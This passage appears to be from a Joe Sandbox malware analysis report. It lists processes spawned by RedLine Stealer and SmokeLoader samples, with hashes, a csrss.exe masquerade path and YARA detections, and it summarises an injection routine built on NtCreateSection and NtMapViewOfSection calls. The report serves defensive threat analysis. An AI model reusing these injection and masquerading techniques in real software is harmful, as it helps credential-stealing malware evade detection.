                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\4AFA.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\4AFA.exe
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:311'296 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:33A60439E95F0DFC10016075F97AEB0C
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2636286578.00000000009B9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.2635807336.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                • Detection: 49%, ReversingLabs
                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                                                                                Start time:02:06:47
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:2'037'760 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:57C833BFD5042E34BEC23DFD711CD151
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.2581619719.000000000269C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                • Detection: 49%, ReversingLabs
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                                                                                Start time:02:06:51
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 360
                                                                                                                                                                                                                                                                                                                Imagebase:0xc70000
                                                                                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                                                                                Start time:02:06:52
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:2'037'760 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:57C833BFD5042E34BEC23DFD711CD151
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                                                                                                Start time:02:06:53
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\6942.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\6942.exe
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:306'176 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:41C7BCD9B6084D7A61B8A54DF1A525E0
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.2725479628.0000000000A91000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000012.00000002.2725479628.0000000000A91000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000012.00000002.2725132501.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.2725606153.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000003.2673791095.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000012.00000002.2725411734.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000012.00000002.2725411734.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                                                                                Start time:02:06:53
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                Imagebase:0x580000
                                                                                                                                                                                                                                                                                                                File size:4'514'184 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                                                                                Start time:02:06:56
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff609140000
                                                                                                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                                                                                Start time:02:07:10
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:2'037'760 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:57C833BFD5042E34BEC23DFD711CD151
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.2824529669.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                • Detection: 49%, ReversingLabs
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                                                                                Start time:02:07:16
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:2'037'760 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:57C833BFD5042E34BEC23DFD711CD151
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                                                                                Start time:02:07:18
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:2'037'760 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:57C833BFD5042E34BEC23DFD711CD151
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000017.00000002.2876036619.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                                                                                Start time:02:07:22
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:2'037'760 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:57C833BFD5042E34BEC23DFD711CD151
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                                                                                                Start time:02:07:27
                                                                                                                                                                                                                                                                                                                Start date:02/12/2023
                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\wjdvfwi
                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\wjdvfwi
                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                File size:306'176 bytes
                                                                                                                                                                                                                                                                                                                MD5 hash:41C7BCD9B6084D7A61B8A54DF1A525E0
                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000019.00000002.3064349726.0000000000991000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000019.00000002.3064349726.0000000000991000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000019.00000003.3012627913.0000000000970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000019.00000002.3064197285.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.3064656629.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000019.00000002.3064229344.0000000000970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000019.00000002.3064229344.0000000000970000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                  Execution Coverage:5.4%
                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:67.6%
                                                                                                                                                                                                                                                                                                                  Signature Coverage:29.7%
                                                                                                                                                                                                                                                                                                                  Total number of Nodes:74
                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:7
                                                                                                                                                                                                                                                                                                                  execution_graph 10973 42ed70 10974 42fae0 10973->10974 10977 42e6b0 10974->10977 10984 42e6d8 GlobalAlloc 10977->10984 10979 42eae7 10986 42e080 10979->10986 10981 42ebf4 10982 42ec24 GlobalFlags LocalSize 10981->10982 10983 42ec48 LoadLibraryA 10981->10983 10982->10981 10985 42ec63 10983->10985 10984->10979 10987 42e0b2 VirtualProtect 10986->10987 10987->10981 10989 402f03 10990 402f11 10989->10990 10992 402f9d 10990->10992 10993 401969 10990->10993 10994 401977 10993->10994 10995 4019ac Sleep 10994->10995 10996 4019c7 10995->10996 10998 4019d8 10996->10998 10999 401590 10996->10999 10998->10992 11000 4015a1 10999->11000 11001 401639 NtDuplicateObject 11000->11001 11003 401755 11000->11003 11002 401656 NtCreateSection 11001->11002 11001->11003 11004 4016d6 NtCreateSection 11002->11004 11005 40167c NtMapViewOfSection 11002->11005 11003->10998 11004->11003 11007 401702 11004->11007 11005->11004 11006 40169f NtMapViewOfSection 11005->11006 11006->11004 11010 4016bd 11006->11010 11007->11003 11008 40170c NtMapViewOfSection 11007->11008 11008->11003 11009 401733 NtMapViewOfSection 11008->11009 11009->11003 11010->11004 11011 89003c 11012 890049 11011->11012 11024 890e0f SetErrorMode SetErrorMode 11012->11024 11017 890265 11018 8902ce VirtualProtect 11017->11018 11020 89030b 11018->11020 11019 890439 VirtualFree 11023 8904be LoadLibraryA 11019->11023 11020->11019 11022 8908c7 11023->11022 11025 890223 11024->11025 11026 890d90 11025->11026 11027 890dad 11026->11027 11028 890dbb GetPEB 11027->11028 11029 890238 VirtualAlloc 11027->11029 11028->11029 11029->11017 11030 91e218 11031 91e227 11030->11031 11034 91e9b8 11031->11034 11035 91e9d3 11034->11035 11036 91e9dc CreateToolhelp32Snapshot 11035->11036 11037 91e9f8 Module32First 11035->11037 11036->11035 11036->11037 11038 91ea07 11037->11038 11039 91e230 11037->11039 11041 91e677 11038->11041 11042 91e6a2 11041->11042 11043 91e6b3 VirtualAlloc 11042->11043 11044 91e6eb 11042->11044 11043->11044 11044->11044 11045 40f389 11046 40f3a1 11045->11046 11050 40f399 __invoke_watson 11045->11050 11051 40b124 11046->11051 11048 40b124 __calloc_crt RtlAllocateHeap 11049 40f3c5 __wsetenvp 11048->11049 11049->11048 11049->11050 11054 40b12d 11051->11054 11053 40b16a 11053->11049 11054->11053 11055 40d8ac 11054->11055 11058 40d8b8 __calloc_crt 11055->11058 11056 40d8e6 RtlAllocateHeap 11057 40d8c4 11056->11057 11056->11058 11057->11054 11058->11056 11058->11057 11059 4029f9 11060 4029ee 11059->11060 11061 402a0f LdrLoadDll 11060->11061 11062 402a1f 11061->11062 11063 40d88e HeapCreate

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 211 401590-4015c0 218 4015c6-4015e3 call 40120e 211->218 219 4015cd 211->219 223 4015e5 218->223 224 4015e8-4015ed 218->224 219->218 223->224 226 401913-40191b 224->226 227 4015f3-401604 224->227 226->224 232 401920-401966 call 40120e 226->232 230 401911 227->230 231 40160a-401633 227->231 230->232 231->230 239 401639-401650 NtDuplicateObject 231->239 239->230 241 401656-40167a NtCreateSection 239->241 243 4016d6-4016fc NtCreateSection 241->243 244 40167c-40169d NtMapViewOfSection 241->244 243->230 248 401702-401706 243->248 244->243 246 40169f-4016bb NtMapViewOfSection 244->246 246->243 249 4016bd-4016d3 246->249 248->230 251 40170c-40172d NtMapViewOfSection 248->251 249->243 251->230 253 401733-40174f NtMapViewOfSection 251->253 253->230 256 401755 call 40175a 253->256
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: d6964195f2ae178c179c3b7a32e304a619fe45f2cb2dcf097c8130f3d204b23e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64616FB0904205FFEB208F91CC58FAF7BB8EF81710F10416AFA12BA1E5D6749941DB65
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 258 40159b-4015c0 263 4015c6-4015e3 call 40120e 258->263 264 4015cd 258->264 268 4015e5 263->268 269 4015e8-4015ed 263->269 264->263 268->269 271 401913-40191b 269->271 272 4015f3-401604 269->272 271->269 277 401920-401966 call 40120e 271->277 275 401911 272->275 276 40160a-401633 272->276 275->277 276->275 284 401639-401650 NtDuplicateObject 276->284 284->275 286 401656-40167a NtCreateSection 284->286 288 4016d6-4016fc NtCreateSection 286->288 289 40167c-40169d NtMapViewOfSection 286->289 288->275 293 401702-401706 288->293 289->288 291 40169f-4016bb NtMapViewOfSection 289->291 291->288 294 4016bd-4016d3 291->294 293->275 296 40170c-40172d NtMapViewOfSection 293->296 294->288 296->275 298 401733-40174f NtMapViewOfSection 296->298 298->275 301 401755 call 40175a 298->301
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff81ed2e81490e93a7bfe721f9c6a4d9304ec08e35c355afa89281eda0ffd623
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E5109B5900249BFEB208F91CC49FAB7BB8FF85710F144169FA11BA2E5D6749941CB24
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 303 4015b0-4015c0 306 4015c6-4015e3 call 40120e 303->306 307 4015cd 303->307 311 4015e5 306->311 312 4015e8-4015ed 306->312 307->306 311->312 314 401913-40191b 312->314 315 4015f3-401604 312->315 314->312 320 401920-401966 call 40120e 314->320 318 401911 315->318 319 40160a-401633 315->319 318->320 319->318 327 401639-401650 NtDuplicateObject 319->327 327->318 329 401656-40167a NtCreateSection 327->329 331 4016d6-4016fc NtCreateSection 329->331 332 40167c-40169d NtMapViewOfSection 329->332 331->318 336 401702-401706 331->336 332->331 334 40169f-4016bb NtMapViewOfSection 332->334 334->331 337 4016bd-4016d3 334->337 336->318 339 40170c-40172d NtMapViewOfSection 336->339 337->331 339->318 341 401733-40174f NtMapViewOfSection 339->341 341->318 344 401755 call 40175a 341->344
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
                                                                                                                                                                                                                                                                                                                  • Instruction ID: af686ae4933c2f6004de28669cc23aaadd0110c3f88d1b974755b8c34b4799b2
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E51F9B5900249BFEB208F91CC48FAF7BB8FF85B10F104169FA11BA2E5D6749941CB24
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
